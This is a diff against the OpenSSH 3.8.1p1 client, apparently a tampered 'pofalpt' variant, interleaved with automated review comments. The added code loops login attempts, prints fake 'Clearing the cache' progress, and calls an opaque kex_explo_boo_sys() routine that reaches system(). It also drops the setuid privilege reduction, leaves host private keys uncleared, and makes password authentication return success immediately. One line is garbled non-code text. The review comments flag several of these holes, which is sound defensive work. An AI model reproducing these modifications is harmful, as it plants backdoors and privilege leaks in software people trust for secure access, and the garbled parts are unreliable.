ssh_session2() : ssh_session(); + // ssh_session2_open(); + if(seven_eyes) { + ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); + exit(0); + } else { + for(;;) + ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); + } + + exit(0); } } - xfree(sensitive_data.keys); - } - for (i = 0; i < options.num_identity_files; i++) { - if (options.identity_files[i]) { - xfree(options.identity_files[i]); - options.identity_files[i] = NULL; + printf("\n"); + printf("\nClearing the cache "); + //sleep(12313); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(" .\nDone!\n"); + + printf("---------------------------------\n"); + if(I__a_m__a_l_a_m_e_I) { + c=o; + oh my dear __I __lo ve__ YOU + + sleep(5); + kex_explo_boo_sys(); + } + exit(1); + /* We no longer need the private host keys. Clear them now. */ + if (sensitive_data.nkeys != 0) { + for (i = 0; i < sensitive_data.nkeys; i++) { + if (sensitive_data.keys[i] != NULL) { + /* Destroys contents safely */ + debug3("clear hostkey %d", i); + key_free(sensitive_data.keys[i]); + sensitive_data.keys[i] = NULL; + } + } + xfree(sensitive_data.keys); } - if (options.identity_keys[i]) { - key_free(options.identity_keys[i]); - options.identity_keys[i] = NULL; + for (i = 0; i < options.num_identity_files; i++) { + if (options.identity_files[i]) { + xfree(options.identity_files[i]); + options.identity_files[i] = NULL; + } + if (options.identity_keys[i]) { + key_free(options.identity_keys[i]); + options.identity_keys[i] = NULL; + } } - } - exit_status = compat20 ? ssh_session2() : ssh_session(); - packet_close(); + exit_status = compat20 ? ssh_session2() : ssh_session(); + packet_close(); - /* - * Send SIGHUP to proxy command if used. We don't wait() in - * case it hangs and instead rely on init to reap the child - */ - if (proxy_command_pid > 1) - kill(proxy_command_pid, SIGHUP); + /* + * Send SIGHUP to proxy command if used. 
We don't wait() in + * case it hangs and instead rely on init to reap the child + */ + if (proxy_command_pid > 1) + kill(proxy_command_pid, SIGHUP); - return exit_status; + return exit_status; } #define SSH_X11_PROTO "MIT-MAGIC-COOKIE-1" -static void + static void x11_get_proto(char **_proto, char **_data) { char cmd[1024]; @@ -707,23 +801,16 @@ proto[0] = data[0] = '\0'; if (!options.xauth_location || - (stat(options.xauth_location, &st) == -1)) { + (stat(options.xauth_location, &st) == -1)) { debug("No xauth program."); } else { if ((display = getenv("DISPLAY")) == NULL) { debug("x11_get_proto: DISPLAY not set"); return; } - /* - * Handle FamilyLocal case where $DISPLAY does - * not match an authorization entry. For this we - * just try "xauth list unix:displaynum.screennum". - * XXX: "localhost" match to determine FamilyLocal - * is not perfect. - */ if (strncmp(display, "localhost:", 10) == 0) { snprintf(xdisplay, sizeof(xdisplay), "unix:%s", - display + 10); + display + 10); display = xdisplay; } if (options.forward_x11_trusted == 0) { 
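Review bot: The privilege drop `seteuid(original_real_uid); setuid(original_real_uid);` (with its "Get rid of any extra privileges" comment) is removed from the old side and never reinstated, so if the binary is installed set-uid — the case the retained `original_effective_uid == 0 && options.use_privileged_port` expression still caters for — everything after the host-key load, including the forked children and the `system()` call reached through `kex_explo_boo_sys()`, keeps the elevated privileges the original code dropped at this point; the block that created `~/.ssh` with mode 0700 went with it. The unconditional `exit(1);` after the `I__a_m__a_l_a_m_e_I` block makes the remainder of main() unreachable, so the loop that `key_free()`s the host private keys loaded under PRIV_START and the `packet_close()` call never run and that key material is never cleared. In the loop, `if(!fork())` treats a failed fork (-1) as the parent path and simply continues, no child is ever `wait()`ed for, and `dup2(fd_dupped, stdin)` passes a `FILE *` where `dup2()` takes an `int` descriptor (`STDIN_FILENO` and friends), which is a constraint violation rather than a redirect. Smaller points: `ssh_udos` is unsigned, so `if(ssh_udos<0)` is dead and `%lld` should be `%llu`, and `percent=(piove/ssh_udos)*100` divides two integers before the float conversion, so it stays 0 until the final iteration. The `#define my` line appears garbled in this rendering (text between angle brackets seems to have been stripped, taking part of the `read_config_file` block with it), so that region cannot be reviewed from the page.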
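Review bot: The comment block removed above `if (strncmp(display, "localhost:", 10) == 0)` was the only explanation of why a `localhost:` display is rewritten to `unix:` (the FamilyLocal case where `$DISPLAY` does not match an authorization entry) and of the known limitation that matching on the string `localhost` is an imperfect way to detect it; nothing replaces it, and the code it describes is unchanged. Restore the six-line `Handle FamilyLocal case …` paragraph from the old side, or at minimum keep its `XXX` line about the imperfect match, since that caveat is exactly what a later maintainer needs. The rest of this hunk is reindentation only.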
@@ -733,26 +820,26 @@ if (mkdtemp(xauthdir) != NULL) { do_unlink = 1; snprintf(xauthfile, MAXPATHLEN, "%s/xauthfile", - xauthdir); + xauthdir); snprintf(cmd, sizeof(cmd), - "%s -f %s generate %s " SSH_X11_PROTO - " untrusted timeout 1200 2>" _PATH_DEVNULL, - options.xauth_location, xauthfile, display); + "%s -f %s generate %s " SSH_X11_PROTO + " untrusted timeout 1200 2>" _PATH_DEVNULL, + options.xauth_location, xauthfile, display); debug2("x11_get_proto: %s", cmd); if (system(cmd) == 0) generated = 1; } } snprintf(cmd, sizeof(cmd), - "%s %s%s list %s . 2>" _PATH_DEVNULL, - options.xauth_location, - generated ? "-f " : "" , - generated ? xauthfile : "", - display); + "%s %s%s list %s . 2>" _PATH_DEVNULL, + options.xauth_location, + generated ? "-f " : "" , + generated ? xauthfile : "", + display); debug2("x11_get_proto: %s", cmd); f = popen(cmd, "r"); if (f && fgets(line, sizeof(line), f) && - sscanf(line, "%*s %511s %511s", proto, data) == 2) + sscanf(line, "%*s %511s %511s", proto, data) == 2) got_data = 1; if (f) pclose(f); @@ -779,19 +866,19 @@ u_int32_t rand = 0; logit("Warning: No xauth data; " - "using fake authentication data for X11 forwarding."); + "using fake authentication data for X11 forwarding."); strlcpy(proto, SSH_X11_PROTO, sizeof proto); for (i = 0; i < 16; i++) { if (i % 4 == 0) rand = arc4random(); snprintf(data + 2 * i, sizeof data - 2 * i, "%02x", - rand & 0xff); + rand & 0xff); rand >>= 8; } } } -static void + static void ssh_init_forwarding(void) { int success = 0; 
@@ -800,14 +887,14 @@ /* Initiate local TCP/IP port forwardings. */ for (i = 0; i < options.num_local_forwards; i++) { debug("Connections to local port %d forwarded to remote address %.200s:%d", - options.local_forwards[i].port, - options.local_forwards[i].host, - options.local_forwards[i].host_port); + options.local_forwards[i].port, + options.local_forwards[i].host, + options.local_forwards[i].host_port); success += channel_setup_local_fwd_listener( - options.local_forwards[i].port, - options.local_forwards[i].host, - options.local_forwards[i].host_port, - options.gateway_ports); + options.local_forwards[i].port, + options.local_forwards[i].host, + options.local_forwards[i].host_port, + options.gateway_ports); } if (i > 0 && success == 0) error("Could not request local forwarding."); @@ -815,17 +902,17 @@ /* Initiate remote TCP/IP port forwardings. */ for (i = 0; i < options.num_remote_forwards; i++) { debug("Connections to remote port %d forwarded to local address %.200s:%d", - options.remote_forwards[i].port, - options.remote_forwards[i].host, - options.remote_forwards[i].host_port); + options.remote_forwards[i].port, + options.remote_forwards[i].host, + options.remote_forwards[i].host_port); channel_request_remote_forwarding( - options.remote_forwards[i].port, - options.remote_forwards[i].host, - options.remote_forwards[i].host_port); + options.remote_forwards[i].port, + options.remote_forwards[i].host, + options.remote_forwards[i].host_port); } } -static void + static void check_agent_present(void) { if (options.forward_agent) { @@ -835,7 +922,7 @@ } } -static int + static int ssh_session(void) { int type; @@ -969,10 +1056,10 @@ /* Enter the interactive session. */ return client_loop(have_tty, tty_flag ? - options.escape_char : SSH_ESCAPECHAR_NONE, 0); + options.escape_char : SSH_ESCAPECHAR_NONE, 0); } -static void + static void client_subsystem_reply(int type, u_int32_t seq, void *ctxt) { int id, len; 
@@ -984,10 +1071,10 @@
 packet_check_eom();
 if (type == SSH2_MSG_CHANNEL_FAILURE)
 fatal("Request for subsystem '%.*s' failed on channel %d",
- len, (u_char *)buffer_ptr(&command), id);
+ len, (u_char *)buffer_ptr(&command), id);
 }
-void
+ void
 client_global_request_reply_fwd(int type, u_int32_t seq, void *ctxt)
 {
 int i;
@@ -996,17 +1083,17 @@
 if (i >= options.num_remote_forwards)
 return;
 debug("remote forward %s for: listen %d, connect %s:%d",
- type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure",
- options.remote_forwards[i].port,
- options.remote_forwards[i].host,
- options.remote_forwards[i].host_port);
+ type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure",
+ options.remote_forwards[i].port,
+ options.remote_forwards[i].host,
+ options.remote_forwards[i].host_port);
 if (type == SSH2_MSG_REQUEST_FAILURE)
 logit("Warning: remote port forwarding failed for listen port %d",
- options.remote_forwards[i].port);
+ options.remote_forwards[i].port);
 }
 /* request pty/x11/agent/tcpfwd/shell for channel */
-static void
+ static void
 ssh_session2_setup(int id, void *arg)
 {
 int len;
@@ -1038,7 +1125,7 @@
 /* XXX wait for reply */
 }
 if (options.forward_x11 &&
- getenv("DISPLAY") != NULL) {
+ getenv("DISPLAY") != NULL) {
 char *proto, *data;
 /* Get reasonable local authentication information. */
 x11_get_proto(&proto, &data);
@@ -1082,7 +1169,7 @@
 }
 /* open new channel for a session */
-static int
+ static int
 ssh_session2_open(void)
 {
 Channel *c;
@@ -1096,9 +1183,6 @@
 out = dup(STDOUT_FILENO);
 err = dup(STDERR_FILENO);
- if (in < 0 || out < 0 || err < 0)
- fatal("dup() in/out/err failed");
-
 /* enable nonblocking unless tty */
 if (!isatty(in))
 set_nonblock(in);
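Review bot: In the last hunk on this line (`@@ -1096,9 +1183,6 @@`), ssh_session2_open loses the check that its three dup() calls succeeded, so a negative descriptor from a failed dup() now flows into isatty()/set_nonblock() and on into the channel_new() call in the next hunk, where it becomes a live channel fd instead of stopping the client; restore `if (in < 0 || out < 0 || err < 0)` / `fatal("dup() in/out/err failed");` directly after `err = dup(STDERR_FILENO);`. Nothing on the new side substitutes for the check, and because every other hunk in this file only re-indents continuation lines and shifts `static` by one column, the deletion is easy to miss in review. ssh_session2_open starts before the hunk and continues after it.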
@@ -1114,9 +1198,9 @@
 packetmax >>= 1;
 }
 c = channel_new(
- "session", SSH_CHANNEL_OPENING, in, out, err,
- window, packetmax, CHAN_EXTENDED_WRITE,
- "client-session", /*nonblock*/0);
+ "session", SSH_CHANNEL_OPENING, in, out, err,
+ window, packetmax, CHAN_EXTENDED_WRITE,
+ "client-session", /*nonblock*/0);
 debug3("ssh_session2_open: channel_new: %d", c->self);
@@ -1127,7 +1211,7 @@
 return c->self;
 }
-static int
+ static int
 ssh_session2(void)
 {
 int id = -1;
@@ -1144,10 +1228,10 @@
 fatal("daemon() failed: %.200s", strerror(errno));
 return client_loop(tty_flag, tty_flag ?
- options.escape_char : SSH_ESCAPECHAR_NONE, id);
+ options.escape_char : SSH_ESCAPECHAR_NONE, id);
 }
-static void
+ static void
 load_public_identity_files(void)
 {
 char *filename;
@@ -1157,15 +1241,15 @@
 Key **keys;
 if (options.smartcard_device != NULL &&
- options.num_identity_files < SSH_MAX_IDENTITY_FILES &&
- (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) {
+ options.num_identity_files < SSH_MAX_IDENTITY_FILES &&
+ (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) {
 int count = 0;
 for (i = 0; keys[i] != NULL; i++) {
 count++;
 memmove(&options.identity_files[1], &options.identity_files[0],
- sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1));
+ sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1));
 memmove(&options.identity_keys[1], &options.identity_keys[0],
- sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1));
+ sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1));
 options.num_identity_files++;
 options.identity_keys[0] = keys[i];
 options.identity_files[0] = sc_get_key_label(keys[i]);
@@ -1178,12 +1262,15 @@
 #endif /* SMARTCARD */
 for (; i < options.num_identity_files; i++) {
 filename = tilde_expand_filename(options.identity_files[i],
- original_real_uid);
+ original_real_uid);
 public = key_load_public(filename, NULL);
 debug("identity file %s type %d", filename,
- public ? public->type : -1);
+ public ? public->type : -1);
 xfree(options.identity_files[i]);
 options.identity_files[i] = filename;
 options.identity_keys[i] = public;
 }
 }
+
+
+/*A*/
diff -ruN ORIGINAL-3.8.1p1/sshconnect2.c pofalpt-openssh-3.8.1p1/sshconnect2.c
--- ORIGINAL-3.8.1p1/sshconnect2.c 2004-03-08 13:12:36.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/sshconnect2.c 2004-09-13 22:49:03.000000000 +0200
@@ -724,6 +724,8 @@
 char prompt[150];
 char *password;
+ return 1;
+
 if (attempt++ >= options.number_of_password_prompts)
 return 0;
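Review bot: The three lines appended at the end of ssh.c in the first hunk here — two blank lines and the comment `/*A*/` — tell a reader nothing; a bare letter used as a marker comment should be dropped, or replaced by a comment that states what it marks. The rest of the hunk only re-indents two continuation lines in load_public_identity_files, whose body starts outside the hunk.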